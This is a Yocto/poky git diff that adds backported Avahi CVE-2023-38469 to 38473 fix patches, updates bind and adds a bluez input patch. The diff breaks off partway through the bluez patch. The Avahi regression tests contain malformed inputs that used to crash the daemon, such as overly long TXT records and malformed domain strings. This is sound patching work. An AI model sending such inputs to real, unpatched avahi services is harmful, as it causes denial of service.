b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch new file mode 100644 index 0000000000..f8f60ddca1 --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch @@ -0,0 +1,65 @@ +From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001 +From: Evgeny Vereshchagin <evvers@ya.ru> +Date: Wed, 25 Oct 2023 18:15:42 +0000 +Subject: [PATCH] tests: pass overly long TXT resource records + +to make sure they don't crash avahi any more. +It reproduces https://github.com/lathiat/avahi/issues/455 + +Canonical notes: +nickgalanis> removed first hunk since there is no .github dir in this release + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237] +CVE: CVE-2023-38469 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-client/client-test.c | 14 ++++++++++++++ + 1 files changed, 14 insertions(+) + +Index: avahi-0.8/avahi-client/client-test.c +=================================================================== +--- avahi-0.8.orig/avahi-client/client-test.c ++++ avahi-0.8/avahi-client/client-test.c +@@ -22,6 +22,7 @@ + #endif + + #include <stdio.h> ++#include <string.h> + #include <assert.h> + + #include <avahi-client/client.h> +@@ -33,6 +34,8 @@ + #include <avahi-common/malloc.h> + #include <avahi-common/timeval.h> + ++#include <avahi-core/dns.h> ++ + static const AvahiPoll *poll_api = NULL; + static AvahiSimplePoll *simple_poll = NULL; + +@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA + uint32_t cookie; + struct timeval tv; + AvahiAddress a; ++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1]; ++ AvahiStringList *txt = NULL; ++ int r; + + simple_poll = avahi_simple_poll_new(); + poll_api = avahi_simple_poll_get(simple_poll); +@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA + printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL))); + printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6)); + ++ memset(rdata, 1, sizeof(rdata)); ++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt); ++ assert(r >= 0); ++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata)); ++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt); ++ assert(error == AVAHI_ERR_INVALID_RECORD); ++ avahi_string_list_free(txt); ++ + avahi_entry_group_commit (group); + + domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u"); diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch new file mode 100644 index 0000000000..4cca81698b --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch @@ -0,0 +1,57 @@ +From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com> +Date: Tue, 11 Apr 2023 15:29:59 +0200 +Subject: [PATCH] Ensure each label is at least one byte long + +The only allowed exception is single dot, where it should return empty +string. + +Fixes #454. + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c] +CVE: CVE-2023-38470 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-common/domain-test.c | 14 ++++++++++++++ + avahi-common/domain.c | 2 +- + 2 files changed, 15 insertions(+), 1 deletion(-) + +Index: avahi-0.8/avahi-common/domain-test.c +=================================================================== +--- avahi-0.8.orig/avahi-common/domain-test.c ++++ avahi-0.8/avahi-common/domain-test.c +@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH + printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo.")); + avahi_free(s); + ++ printf("%s\n", s = avahi_normalize_name_strdup(".")); ++ avahi_free(s); ++ ++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}." ++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}" ++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`" ++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?." ++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}." ++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?" ++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM." ++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?." ++ "}.?.?.?.}.=.?.?.}"); ++ assert(s == NULL); ++ + printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff")); + printf("%i\n", avahi_domain_equal("A", "a")); + +Index: avahi-0.8/avahi-common/domain.c +=================================================================== +--- avahi-0.8.orig/avahi-common/domain.c ++++ avahi-0.8/avahi-common/domain.c +@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s + } + + if (!empty) { +- if (size < 1) ++ if (size < 2) + return NULL; + + *(r++) = '.'; diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch new file mode 100644 index 0000000000..e0736bf210 --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch @@ -0,0 +1,52 @@ +From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001 +From: Evgeny Vereshchagin <evvers@ya.ru> +Date: Tue, 19 Sep 2023 03:21:25 +0000 +Subject: [PATCH] [common] bail out when escaped labels can't fit into ret + +Fixes: +``` +==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8 +READ of size 1110 at 0x7f9e76f14c16 thread T0 + #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba) + #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12 + #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12 +``` +and +``` +fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed. +==101571== ERROR: libFuzzer: deadly signal + #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8) + #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8) + #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8) + #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25) + #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9 +``` + +It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-2.patch?h=ubuntu/jammy-security +CVE: CVE-2023-38470 #Follow-up patch +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-common/domain.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +Index: avahi-0.8/avahi-common/domain.c +=================================================================== +--- avahi-0.8.orig/avahi-common/domain.c ++++ avahi-0.8/avahi-common/domain.c +@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s + } else + empty = 0; + +- avahi_escape_label(label, strlen(label), &r, &size); ++ if (!(avahi_escape_label(label, strlen(label), &r, &size))) ++ return NULL; + } + + return ret_s; diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch new file mode 100644 index 0000000000..07cd3246e8 --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch @@ -0,0 +1,73 @@ +From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001 +From: Michal Sekletar <msekleta@redhat.com> +Date: Mon, 23 Oct 2023 13:38:35 +0200 +Subject: [PATCH] core: extract host name using avahi_unescape_label() + +Previously we could create invalid escape sequence when we split the +string on dot. For example, from valid host name "foo\\.bar" we have +created invalid name "foo\\" and tried to set that as the host name +which crashed the daemon. + +Fixes #453 + +CVE-2023-38471 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09] +CVE: CVE-2023-38471 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-core/server.c | 27 +++++++++++++++++++++------ + 1 file changed, 21 insertions(+), 6 deletions(-) + +Index: avahi-0.8/avahi-core/server.c +=================================================================== +--- avahi-0.8.orig/avahi-core/server.c ++++ avahi-0.8/avahi-core/server.c +@@ -1295,7 +1295,11 @@ static void update_fqdn(AvahiServer *s) + } + + int avahi_server_set_host_name(AvahiServer *s, const char *host_name) { +- char *hn = NULL; ++ char label_escaped[AVAHI_LABEL_MAX*4+1]; ++ char label[AVAHI_LABEL_MAX]; ++ char *hn = NULL, *h; ++ size_t len; ++ + assert(s); + + AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME); +@@ -1305,17 +1309,28 @@ int avahi_server_set_host_name(AvahiServ + else + hn = avahi_normalize_name_strdup(host_name); + +- hn[strcspn(hn, ".")] = 0; ++ h = hn; ++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) { ++ avahi_free(h); ++ return AVAHI_ERR_INVALID_HOST_NAME; ++ } ++ ++ avahi_free(h); + +- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) { +- avahi_free(hn); ++ h = label_escaped; ++ len = sizeof(label_escaped); ++ if (!avahi_escape_label(label, strlen(label), &h, &len)) ++ return AVAHI_ERR_INVALID_HOST_NAME; ++ ++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION) + return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE); +- } + + withdraw_host_rrs(s); + + avahi_free(s->host_name); +- s->host_name = hn; ++ s->host_name = avahi_strdup(label_escaped); ++ if (!s->host_name) ++ return AVAHI_ERR_NO_MEMORY; + + update_fqdn(s); + diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch new file mode 100644 index 0000000000..44737bfc2e --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch @@ -0,0 +1,52 @@ +From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001 +From: Evgeny Vereshchagin <evvers@ya.ru> +Date: Tue, 24 Oct 2023 22:04:51 +0000 +Subject: [PATCH] core: return errors from avahi_server_set_host_name properly + +It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460] +CVE: CVE-2023-38471 #Follow-up Patch +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-core/server.c | 9 ++++++--- + 1 file changed, 6 insertions(+), 3 deletions(-) + +Index: avahi-0.8/avahi-core/server.c +=================================================================== +--- avahi-0.8.orig/avahi-core/server.c ++++ avahi-0.8/avahi-core/server.c +@@ -1309,10 +1309,13 @@ int avahi_server_set_host_name(AvahiServ + else + hn = avahi_normalize_name_strdup(host_name); + ++ if (!hn) ++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY); ++ + h = hn; + if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) { + avahi_free(h); +- return AVAHI_ERR_INVALID_HOST_NAME; ++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME); + } + + avahi_free(h); +@@ -1320,7 +1323,7 @@ int avahi_server_set_host_name(AvahiServ + h = label_escaped; + len = sizeof(label_escaped); + if (!avahi_escape_label(label, strlen(label), &h, &len)) +- return AVAHI_ERR_INVALID_HOST_NAME; ++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME); + + if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION) + return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE); +@@ -1330,7 +1333,7 @@ int avahi_server_set_host_name(AvahiServ + avahi_free(s->host_name); + s->host_name = avahi_strdup(label_escaped); + if (!s->host_name) +- return AVAHI_ERR_NO_MEMORY; ++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY); + + update_fqdn(s); + diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch new file mode 100644 index 0000000000..5c63edb31f --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch @@ -0,0 +1,45 @@ +From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001 +From: Michal Sekletar <msekleta@redhat.com> +Date: Thu, 19 Oct 2023 17:36:44 +0200 +Subject: [PATCH] core: make sure there is rdata to process before parsing it + +Fixes #452 + +CVE-2023-38472 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40] +CVE: CVE-2023-38472 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-client/client-test.c | 3 +++ + avahi-daemon/dbus-entry-group.c | 2 +- + 2 files changed, 4 insertions(+), 1 deletion(-) + +Index: avahi-0.8/avahi-client/client-test.c +=================================================================== +--- avahi-0.8.orig/avahi-client/client-test.c ++++ avahi-0.8/avahi-client/client-test.c +@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA + assert(error == AVAHI_ERR_INVALID_RECORD); + avahi_string_list_free(txt); + ++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0); ++ assert(error != AVAHI_OK); ++ + avahi_entry_group_commit (group); + + domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u"); +Index: avahi-0.8/avahi-daemon/dbus-entry-group.c +=================================================================== +--- avahi-0.8.orig/avahi-daemon/dbus-entry-group.c ++++ avahi-0.8/avahi-daemon/dbus-entry-group.c +@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g + if (!(r = avahi_record_new_full (name, clazz, type, ttl))) + return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL); + +- if (avahi_rdata_parse (r, rdata, size) < 0) { ++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) { + avahi_record_unref (r); + return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL); + } diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch new file mode 100644 index 0000000000..d7c69225b1 --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch @@ -0,0 +1,109 @@ +From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001 +From: Michal Sekletar <msekleta@redhat.com> +Date: Wed, 11 Oct 2023 17:45:44 +0200 +Subject: [PATCH] common: derive alternative host name from its unescaped + version + +Normalization of input makes sure we don't have to deal with special +cases like unescaped dot at the end of label. + +Fixes #451 #487 +CVE-2023-38473 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797] +CVE: CVE-2023-38473 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-common/alternative-test.c | 3 +++ + avahi-common/alternative.c | 27 +++++++++++++++++++-------- + 2 files changed, 22 insertions(+), 8 deletions(-) + +Index: avahi-0.8/avahi-common/alternative-test.c +=================================================================== +--- avahi-0.8.orig/avahi-common/alternative-test.c ++++ avahi-0.8/avahi-common/alternative-test.c +@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH + const char* const test_strings[] = { + "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", + "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü", ++ ").", ++ "\\.", ++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\", + "gurke", + "-", + " #", +Index: avahi-0.8/avahi-common/alternative.c +=================================================================== +--- avahi-0.8.orig/avahi-common/alternative.c ++++ avahi-0.8/avahi-common/alternative.c +@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c + } + + char *avahi_alternative_host_name(const char *s) { ++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1]; ++ char *alt, *r, *ret; + const char *e; +- char *r; ++ size_t len; + + assert(s); + + if (!avahi_is_valid_host_name(s)) + return NULL; + +- if ((e = strrchr(s, '-'))) { ++ if (!avahi_unescape_label(&s, label, sizeof(label))) ++ return NULL; ++ ++ if ((e = strrchr(label, '-'))) { + const char *p; + + e++; +@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const + + if (e) { + char *c, *m; +- size_t l; + int n; + + n = atoi(e)+1; + if (!(m = avahi_strdup_printf("%i", n))) + return NULL; + +- l = e-s-1; ++ len = e-label-1; + +- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1) +- l = AVAHI_LABEL_MAX-1-strlen(m)-1; ++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1) ++ len = AVAHI_LABEL_MAX-1-strlen(m)-1; + +- if (!(c = avahi_strndup(s, l))) { ++ if (!(c = avahi_strndup(label, len))) { + avahi_free(m); + return NULL; + } +@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const + } else { + char *c; + +- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2))) ++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2))) + return NULL; + + drop_incomplete_utf8(c); +@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const + avahi_free(c); + } + ++ alt = alternative; ++ len = sizeof(alternative); ++ ret = avahi_escape_label(r, strlen(r), &alt, &len); ++ ++ avahi_free(r); ++ r = avahi_strdup(ret); ++ + assert(avahi_is_valid_host_name(r)); + + return r; diff --git a/poky/meta/recipes-connectivity/bind/bind_9.18.19.bb b/poky/meta/recipes-connectivity/bind/bind_9.18.20.bb index 8124c5c591..187685eef5 100644 --- a/poky/meta/recipes-connectivity/bind/bind_9.18.19.bb +++ b/poky/meta/recipes-connectivity/bind/bind_9.18.20.bb @@ -20,7 +20,7 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.xz \ file://0001-avoid-start-failure-with-bind-user.patch \ " -SRC_URI[sha256sum] = "115e09c05439bebade1d272eda08fa88eb3b60129edef690588c87a4d27612cc" +SRC_URI[sha256sum] = "4b891ebf58d3f2a7ac3dd2682990f528a3448eaa1c992ddc5c141b8587a98ec5" UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" # follow the ESV versions divisible by 2 diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5.inc b/poky/meta/recipes-connectivity/bluez5/bluez5.inc index e10158a6e5..a23e4e58a6 100644 --- a/poky/meta/recipes-connectivity/bluez5/bluez5.inc +++ b/poky/meta/recipes-connectivity/bluez5/bluez5.inc @@ -55,6 +55,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \ file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \ file://0001-test-gatt-Fix-hung-issue.patch \ file://0004-src-shared-util.c-include-linux-limits.h.patch \ + file://0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch \ " S = "${WORKDIR}/bluez-${PV}" diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch b/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch new file mode 100644 index 0000000000..d0884338db --- /dev/null +++ b/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch @@ -0,0 +1,313 @@ +From 3a9c637010f8dc1ba3e8382abe01065761d4f5bb Mon Sep 17 00:00:00 2001 +From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> +Date: Tue, 10 Oct 2023 12:38:29 -0700 +Subject: [PATCH 02/40] input: Fix .device_probe failing if SDP record is not + found + +Due to changes introduced by 67a26abe53bf +("profile: Add probe_on_discover flag") profiles may get probed when +their profile UUID are discovered, rather than resolved, which means +the SDP record may not be available. + +Fixes: https://github.com/bluez/bluez/issues/614 + +Upstream-Status: Backport [https://github.com/bluez/bluez/commit/3a9c637010f8dc1ba3e8382abe01065761d4f5bb] +--- + profiles/input/device.c | 182 +++++++++++++++++++--------------------- + 1 file changed, 84 insertions(+), 98 deletions(-) + +diff --git a/profiles/input/device.c b/profiles/input/device.c +index e2ac6ea60..4a50ea992 100644 +--- a/profiles/input/device.c ++++ b/profiles/input/device.c +@@ -60,7 +60,7 @@ struct input_device { + char *path; + bdaddr_t src; + bdaddr_t dst; +- uint32_t handle; ++ const sdp_record_t *rec; + GIOChannel *ctrl_io; + GIOChannel *intr_io; + guint ctrl_watch; +@@ -754,7 +754,8 @@ static void epox_endian_quirk(unsigned char *data, int size) + } + } + +-static int create_hid_dev_name(sdp_record_t *rec, struct hidp_connadd_req *req) ++static int create_hid_dev_name(const sdp_record_t *rec, ++ struct hidp_connadd_req *req) + { + char sdesc[sizeof(req->name) / 2]; + +@@ -776,7 +777,7 @@ static int create_hid_dev_name(sdp_record_t *rec, struct hidp_connadd_req *req) + + /* See HID profile specification v1.0, "7.11.6 HIDDescriptorList" for details + * on the attribute format. */ +-static int extract_hid_desc_data(sdp_record_t *rec, ++static int extract_hid_desc_data(const sdp_record_t *rec, + struct hidp_connadd_req *req) + { + sdp_data_t *d; +@@ -817,36 +818,40 @@ invalid_desc: + return -EINVAL; + } + +-static int extract_hid_record(sdp_record_t *rec, struct hidp_connadd_req *req) ++static int extract_hid_record(struct input_device *idev, ++ struct hidp_connadd_req *req) + { + sdp_data_t *pdlist; + uint8_t attr_val; + int err; + +- err = create_hid_dev_name(rec, req); ++ if (!idev->rec) ++ return -ENOENT; ++ ++ err = create_hid_dev_name(idev->rec, req); + if (err < 0) + DBG("No valid Service Name or Service Description found"); + +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_PARSER_VERSION); ++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_PARSER_VERSION); + req->parser = pdlist ? pdlist->val.uint16 : 0x0100; + +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_DEVICE_SUBCLASS); ++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_DEVICE_SUBCLASS); + req->subclass = pdlist ? pdlist->val.uint8 : 0; + +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_COUNTRY_CODE); ++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_COUNTRY_CODE); + req->country = pdlist ? pdlist->val.uint8 : 0; + +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_VIRTUAL_CABLE); ++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_VIRTUAL_CABLE); + attr_val = pdlist ? pdlist->val.uint8 : 0; + if (attr_val) + req->flags |= (1 << HIDP_VIRTUAL_CABLE_UNPLUG); + +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_BOOT_DEVICE); ++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_BOOT_DEVICE); + attr_val = pdlist ? pdlist->val.uint8 : 0; + if (attr_val) + req->flags |= (1 << HIDP_BOOT_PROTOCOL_MODE); + +- err = extract_hid_desc_data(rec, req); ++ err = extract_hid_desc_data(idev->rec, req); + if (err < 0) + return err; + +@@ -1035,11 +1040,6 @@ static gboolean encrypt_notify(GIOChannel *io, GIOCondition condition, + static int hidp_add_connection(struct input_device *idev) + { + struct hidp_connadd_req *req; +- sdp_record_t *rec; +- char src_addr[18], dst_addr[18]; +- char filename[PATH_MAX]; +- GKeyFile *key_file; +- char handle[11], *str; + GError *gerr = NULL; + int err; + +@@ -1049,33 +1049,7 @@ static int hidp_add_connection(struct input_device *idev) + req->flags = 0; + req->idle_to = idle_timeout; + +- ba2str(&idev->src, src_addr); +- ba2str(&idev->dst, dst_addr); +- +- snprintf(filename, PATH_MAX, STORAGEDIR "/%s/cache/%s", src_addr, +- dst_addr); +- sprintf(handle, "0x%8.8X", idev->handle); +- +- key_file = g_key_file_new(); +- if (!g_key_file_load_from_file(key_file, filename, 0, &gerr)) { +- error("Unable to load key file from %s: (%s)", filename, +- gerr->message); +- g_clear_error(&gerr); +- } +- str = g_key_file_get_string(key_file, "ServiceRecords", handle, NULL); +- g_key_file_free(key_file); +- +- if (!str) { +- error("Rejected connection from unknown device %s", dst_addr); +- err = -EPERM; +- goto cleanup; +- } +- +- rec = record_from_string(str); +- g_free(str); +- +- err = extract_hid_record(rec, req); +- sdp_record_free(rec); ++ err = extract_hid_record(idev, req); + if (err < 0) { + error("Could not parse HID SDP record: %s (%d)", strerror(-err), + -err); +@@ -1091,7 +1065,7 @@ static int hidp_add_connection(struct input_device *idev) + + /* Make sure the device is bonded if required */ + if (classic_bonded_only && !input_device_bonded(idev)) { +- error("Rejected connection from !bonded device %s", dst_addr); ++ error("Rejected connection from !bonded device %s", idev->path); + goto cleanup; + } + +@@ -1161,6 +1135,68 @@ static int connection_disconnect(struct input_device *idev, uint32_t flags) + return ioctl_disconnect(idev, flags); + } + ++static bool is_device_sdp_disable(const sdp_record_t *rec) ++{ ++ sdp_data_t *data; ++ ++ data = sdp_data_get(rec, SDP_ATTR_HID_SDP_DISABLE); ++ ++ return data && data->val.uint8; ++} ++ ++static enum reconnect_mode_t hid_reconnection_mode(bool reconnect_initiate, ++ bool normally_connectable) ++{ ++ if (!reconnect_initiate && !normally_connectable) ++ return RECONNECT_NONE; ++ else if (!reconnect_initiate && normally_connectable) ++ return RECONNECT_HOST; ++ else if (reconnect_initiate && !normally_connectable) ++ return RECONNECT_DEVICE; ++ else /* (reconnect_initiate && normally_connectable) 